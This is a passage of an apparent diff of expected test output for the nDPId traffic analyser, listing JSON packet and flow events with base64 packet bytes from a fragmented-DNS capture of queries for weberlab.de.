5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} 02441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1558968021027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAXciTwgAEARrMjBGOPuSn0viAA158IGrsPBFaiEEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="}
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00645{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAD6iTwAuUAR0PHBGOPuSn0viJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAD6iTwAuUAR0PHBGOPuSn0viJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"}
00224{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968021027} 00210{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968021027}
00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1558968031134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968031134,"pkt":"AAwpil3XAIac51UUht1gCRS7AEMRbCoAFFBAEwwFAAAAAAAAAQ4gAQRwdlsAAAAAAAAKJQBTiIAANQBD+GeeBgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1558968031134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968031134,"pkt":"AAwpil3XAIac51UUht1gCRS7AEMRbCoAFFBAEwwFAAAAAAAAAQ4gAQRwdlsAAAAAAAAKJQBTiIAANQBD+GeeBgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="}
00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -104,15 +104,15 @@
00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1560869905222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869905222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1560869905222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1560869905222,"pkt":"CFsOoYNeAAwpfKTLht1gDZ0NADwRQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBT2bEANQA8zxHCoAEgAAEAAAAAAAEId2ViZXJsYWICZGUAADAAAQAAKRAAAACAAAAMAAoACPFs5uYvfUZc"}
02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1560869905232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1494,"pkt_l4_len":1432,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyBaAsPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAAAQAABpoANdmxBspAOcKghQAAAQAEAAAAAQh3ZWJlcmxhYgJkZQAAMAABwAwAMAABAAAAPAIIAQEDCgMBAAHd7\/3tIq12CjsLWBAd1T3u8\/far4uZXvf8tV18qZaecv+cWqq5v63pRvKYMfBrDVtiIL4iSgCelIlOORESqB\/n89qn9klBRxVsJMHolsi2eBGR4aML4ghMfeD+DrMDSl5nWB3t\/K5Rz2vtzsqVvYGH0fZYQiit53gj6vP2hRbE0yO3UPkNpBEVogjAsm5eFjsLAaP0ZZzzOMrnzCiJQAYjOTVkDzZiOo2MwGKWKMlIXfR55yCA5TUPPR6V0HRZsrDK2l2G+6gzqDhIjqHbbSh9Mv77SdkkVNOUReABLpmnCFMwIuSy9nDEMQu7e65QyOF+NjUXziwKhrjnnJRY86s9znQCVnoPwAJ0m29NgBgpEN+9E19YVr3gF7esaT1ji4B10iyBf5c\/sJfg5vGTVg55+cxCbhI98aL2tYPM5kVyTpqgOlYRqnsMRfHPsinjRDh8+F+P0S5lhyLhG726D9NA5OQPW4cmRlbMrTiYPjcIRULbwVi5g\/NhRbX0rdr5mxRTcAGTp0WViThvS+0xXBiJtThFC5qIVMhS7ARjFwxTrtZNKOqapuPebbAbjMiTaX3UKD8DpFKbCouo5jaur0Y77zYiW3BcpU0K6hxkxrjqKblLAW1F4\/5zq+COo+NpOhgyLk8iw5Gla3a8V5hp3zZ0rXalprx16P2BcHZbPW3E+8AMADAAAQAAADwBCAEAAwoDAQAB0FTcKPFQrDtJ5jNrtzHKr9eDfOdVCwzO4X9R4tqKA65u0keHGEv6bXb0jFCRMqjwlEhdwpcP5pWLO2KaXz7wE8JcU09+0Wl0ULMFE0YeP9xrWD8WVyTq\/lq9p8H+EaptYpjYsQYpvmS1hYaPwkHSasoaoNlU\/KJ4LR1hW\/TaI5o69SF2XtC2BXJtHdXqAeWGgbQHEb4ZuNSn43I8KVu4w4jB+VtUYHn3jo\/JAZCCcY1fYvUwe6Y5pgL8PdSfLNBk0yaqPzkbAM0\/AR4N8urrCbUFR\/HszDBwRW47YHRiZTKI+JJ9SgZPCbY\/WcY0yGViKPdtj1W\/LEKo9CcrSzlOvcAMAC4AAQAAADwCHwAwCgIAAAA8XSexsF0AI8Ezewh3ZWJlcmxhYgJkZQDDZMohasNCzdZy+qXT+i9EuX\/inlaoHckoPQ6pZUM55HOKiXWwbCF2bgR2vTatltfgdQMYsjHLb9y8\/8K16x1bINo7jHhPhiQ3mZPnhRDbC819\/mg\/DAJlEfo4\/PIHroaOXHkEsxclA3Sfl5XzqMY8dIIjCMSIRohmpz3ajd1g8Q5nPhvruiTi3rbkkaFuvAu6JBazSxvplBTGRsLiwD\/keT1H0ch7BVc1oZ6xmkqy68vIsD63Fj1r1Prt7pmrCHTCuEgsO78D9dCQuWCLkJQxGUVXJj5CI3Hv7xFFgpu2WdK7EiEBH5rHphjb8hJPFep1cggzgdSO7gr4PL16UQJ4paFWEovlSSSKN6CqV0KlzY5UKpoC4bOcRMiiujkcgLRcJzDNjTcP59699eiRBYcnSUNu7NR\/AQOsLe1gcGBMYVI28uXABijFJJPUYQFFRKKQYYy7U8augfodJClNM+5PjDrN7VUaoyW\/CtbFigLZaje\/SbLFkod9oTkuhnetL7fyEnlGfxKmEZ218qPcsKDJRrRyymc+WdZ+tPcZvQXr6AVS7RZSoUTV\/+5dVd2kWuuF2w5rsnAIOU3wwIEPhsTwq9njhb9Bp9jOMH3FFbo4srNvY4pocOs9Lic1Os813bu7VyQz3Nrv\/xfPOPvvG\/\/ufcPEO13FnB7dwg\/ymTeeu8NjAC4AAQAAADwBHwAwCgIAAAA8XSexsF0AI8GQRwh3"} 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1560869905232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1494,"pkt_l4_len":1432,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyBaAsPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAAAQAABpoANdmxBspAOcKghQAAAQAEAAAAAQh3ZWJlcmxhYgJkZQAAMAABwAwAMAABAAAAPAIIAQEDCgMBAAHd7\/3tIq12CjsLWBAd1T3u8\/far4uZXvf8tV18qZaecv+cWqq5v63pRvKYMfBrDVtiIL4iSgCelIlOORESqB\/n89qn9klBRxVsJMHolsi2eBGR4aML4ghMfeD+DrMDSl5nWB3t\/K5Rz2vtzsqVvYGH0fZYQiit53gj6vP2hRbE0yO3UPkNpBEVogjAsm5eFjsLAaP0ZZzzOMrnzCiJQAYjOTVkDzZiOo2MwGKWKMlIXfR55yCA5TUPPR6V0HRZsrDK2l2G+6gzqDhIjqHbbSh9Mv77SdkkVNOUReABLpmnCFMwIuSy9nDEMQu7e65QyOF+NjUXziwKhrjnnJRY86s9znQCVnoPwAJ0m29NgBgpEN+9E19YVr3gF7esaT1ji4B10iyBf5c\/sJfg5vGTVg55+cxCbhI98aL2tYPM5kVyTpqgOlYRqnsMRfHPsinjRDh8+F+P0S5lhyLhG726D9NA5OQPW4cmRlbMrTiYPjcIRULbwVi5g\/NhRbX0rdr5mxRTcAGTp0WViThvS+0xXBiJtThFC5qIVMhS7ARjFwxTrtZNKOqapuPebbAbjMiTaX3UKD8DpFKbCouo5jaur0Y77zYiW3BcpU0K6hxkxrjqKblLAW1F4\/5zq+COo+NpOhgyLk8iw5Gla3a8V5hp3zZ0rXalprx16P2BcHZbPW3E+8AMADAAAQAAADwBCAEAAwoDAQAB0FTcKPFQrDtJ5jNrtzHKr9eDfOdVCwzO4X9R4tqKA65u0keHGEv6bXb0jFCRMqjwlEhdwpcP5pWLO2KaXz7wE8JcU09+0Wl0ULMFE0YeP9xrWD8WVyTq\/lq9p8H+EaptYpjYsQYpvmS1hYaPwkHSasoaoNlU\/KJ4LR1hW\/TaI5o69SF2XtC2BXJtHdXqAeWGgbQHEb4ZuNSn43I8KVu4w4jB+VtUYHn3jo\/JAZCCcY1fYvUwe6Y5pgL8PdSfLNBk0yaqPzkbAM0\/AR4N8urrCbUFR\/HszDBwRW47YHRiZTKI+JJ9SgZPCbY\/WcY0yGViKPdtj1W\/LEKo9CcrSzlOvcAMAC4AAQAAADwCHwAwCgIAAAA8XSexsF0AI8Ezewh3ZWJlcmxhYgJkZQDDZMohasNCzdZy+qXT+i9EuX\/inlaoHckoPQ6pZUM55HOKiXWwbCF2bgR2vTatltfgdQMYsjHLb9y8\/8K16x1bINo7jHhPhiQ3mZPnhRDbC819\/mg\/DAJlEfo4\/PIHroaOXHkEsxclA3Sfl5XzqMY8dIIjCMSIRohmpz3ajd1g8Q5nPhvruiTi3rbkkaFuvAu6JBazSxvplBTGRsLiwD\/keT1H0ch7BVc1oZ6xmkqy68vIsD63Fj1r1Prt7pmrCHTCuEgsO78D9dCQuWCLkJQxGUVXJj5CI3Hv7xFFgpu2WdK7EiEBH5rHphjb8hJPFep1cggzgdSO7gr4PL16UQJ4paFWEovlSSSKN6CqV0KlzY5UKpoC4bOcRMiiujkcgLRcJzDNjTcP59699eiRBYcnSUNu7NR\/AQOsLe1gcGBMYVI28uXABijFJJPUYQFFRKKQYYy7U8augfodJClNM+5PjDrN7VUaoyW\/CtbFigLZaje\/SbLFkod9oTkuhnetL7fyEnlGfxKmEZ218qPcsKDJRrRyymc+WdZ+tPcZvQXr6AVS7RZSoUTV\/+5dVd2kWuuF2w5rsnAIOU3wwIEPhsTwq9njhb9Bp9jOMH3FFbo4srNvY4pocOs9Lic1Os813bu7VyQz3Nrv\/xfPOPvvG\/\/ufcPEO13FnB7dwg\/ymTeeu8NjAC4AAQAAADwBHwAwCgIAAAA8XSexsF0AI8GQRwh3"}
00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869905232,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}}
00790{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":368,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":368,"pkt_l4_len":0,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyATosPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAFmAAABpplYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRNeoUG2ZbhJAUMEBAu7geapxJ7U1z+UqhkFSi8Qu6jROnMih5xzmixXOjO2RiHT8eMzQMHqilreexmdz+7rH4jCggpAg2YenRMzpvhrf0+OEWUNhwq6dNYVlNWg1Yf1oxCRsZ6Xiq2pemle4KOkgobWECgdELaMnIZKUJ0WtpAZJuCbAIPvak3YgHcNPR4Sbx1lKRTPW6QxjFsHJ5X\/B6mNMVtqG97wzaO\/ugVwH81Qt2Llpj5Wb873AtMbd7OQYLwhJ7fhxJ9xNJn6SlVRp6C+1P2Wyu\/7U0mgP+sAACkQAAAAgAAAHAAKABjxbObmL31GXCozdz5dCPwRZU4FwINgbJY="} 00776{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":368,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":368,"pkt_l4_len":0,"thread_ts_msec":1560869905232,"pkt":"AAwpfKTLCFsOoYNeht1gC9IyATosPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLEQAFmAAABpplYmVybGFiAmRlAKU8TJxFacYrnzjzribJyhzI\/PZTM81o7M0N53bVhGij+9zhJRNeoUG2ZbhJAUMEBAu7geapxJ7U1z+UqhkFSi8Qu6jROnMih5xzmixXOjO2RiHT8eMzQMHqilreexmdz+7rH4jCggpAg2YenRMzpvhrf0+OEWUNhwq6dNYVlNWg1Yf1oxCRsZ6Xiq2pemle4KOkgobWECgdELaMnIZKUJ0WtpAZJuCbAIPvak3YgHcNPR4Sbx1lKRTPW6QxjFsHJ5X\/B6mNMVtqG97wzaO\/ugVwH81Qt2Llpj5Wb873AtMbd7OQYLwhJ7fhxJ9xNJn6SlVRp6C+1P2Wyu\/7U0mgP+sAACkQAAAAgAAAHAAKABjxbObmL31GXCozdz5dCPwRZU4FwINgbJY="}
